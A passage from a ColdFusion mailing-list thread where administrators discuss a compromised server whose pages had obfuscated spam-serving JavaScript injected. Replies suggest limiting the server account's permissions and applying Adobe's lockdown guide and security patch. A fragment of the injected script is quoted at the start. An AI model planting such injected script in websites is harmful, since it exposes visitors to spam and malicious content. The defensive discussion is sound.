'+x[4]+'.'+x[2]+'{'+x[1]+'}/'+x[0]+'');}zdrViewState(); /script followed by a snippet of spam for payday loans. There are many things that could have allowed this to be injected. I recommend that you configure CF to run as a specific user account, and give that user account read/execute permissions to your CF files. By default, CF runs as SYSTEM on Windows, which has full control of all local files. It doesn't need this level of permissions. Doing this won't close the vulnerability used to inject the code in the first place, but it will prevent it from doing anything. Then, once you've done that, read the CF 9 Lockdown Guide and follow its instructions as best you can. You should do this as a matter of course for any CF server install. http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/91025512-cf9-lockdownguide-wp-ue.pdf Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ http://training.figleaf.com/ Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on GSA Schedule, and provides the highest caliber vendor-authorized instruction at our training centers, online, or onsite. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354231 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
Re: Possible Hack?
Yeah I had figured out what the code did. My main concern is figuring out how they did it and preventing it in the future. I had already done the lockdown stuff many months ago which is why I am kind of baffled. I checked the FTP logs and see nothing in there for those files so the attack would have most likely come in via CF somewhere. Does the CF server have permission to write to .cfm files? Dave Watts, CTO, Fig Leaf Software http://www.figleaf.com/ http://training.figleaf.com/ Fig Leaf Software is a Veteran-Owned Small Business (VOSB) on GSA Schedule, and provides the highest caliber vendor-authorized instruction at our training centers, online, or onsite. ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354232 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm
RE: Possible Hack?
http://www.adobe.com/support/security/bulletins/apsb13-03.html This is the recent fix that effected many of our servers. Which lead to many sites (and vps) with that compromise. When Hosting.com (our parent company) sent the notification to their customers there was no hot fix. Our (Hostmysite) admins setup server wide url rewrite rules on our shared servers to restrict CFIDE until a patch was in place. It apparently was the no RDS password (even though disabled) that caused our issue. At least we think. Byron Mann Lead Engineer Architect HostMySite.com ~| Order the Adobe Coldfusion Anthology now! http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354250 Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm